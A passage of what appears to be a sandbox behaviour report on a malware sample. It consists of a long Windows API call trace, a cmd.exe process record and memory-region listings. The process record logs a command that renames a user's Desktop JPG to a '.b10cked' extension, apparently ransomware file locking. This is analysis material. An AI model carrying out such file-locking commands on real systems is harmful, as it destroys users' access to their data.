returned 0x54 [0142.257] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.257] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.259] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.259] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.260] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.260] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.262] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.262] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.263] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.263] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x32, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] GetFileType (hFile=0x4c) returned 0x1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] GetFileType (hFile=0x4c) returned 0x1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x32, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.265] _close (_FileHandle=4) returned 0 [0142.265] FindNextFileW (in: hFindFile=0x1e0e90, lpFindFileData=0x1cef74 | out: lpFindFileData=0x1cef74) returned 0 [0142.266] GetLastError () returned 0x12 [0142.266] FindClose (in: hFindFile=0x1e0e90 | out: hFindFile=0x1e0e90) returned 1 [0142.266] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.267] _close (_FileHandle=3) returned 0 [0142.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.267] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.267] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.267] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.267] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.268] SetConsoleInputExeNameW () returned 0x1 [0142.268] GetConsoleOutputCP () returned 0x1b5 [0142.268] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.268] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.268] exit (_Code=0) Process: id = "175" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15028 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15029 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15030 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15031 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 15032 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15033 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15034 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15035 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15036 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 15037 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16166 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16167 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16168 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16169 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 16170 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 16171 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16172 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16173 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16174 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16175 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16176 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16177 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16178 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16179 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16180 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 16181 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16182 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16183 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16184 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16185 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16186 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = 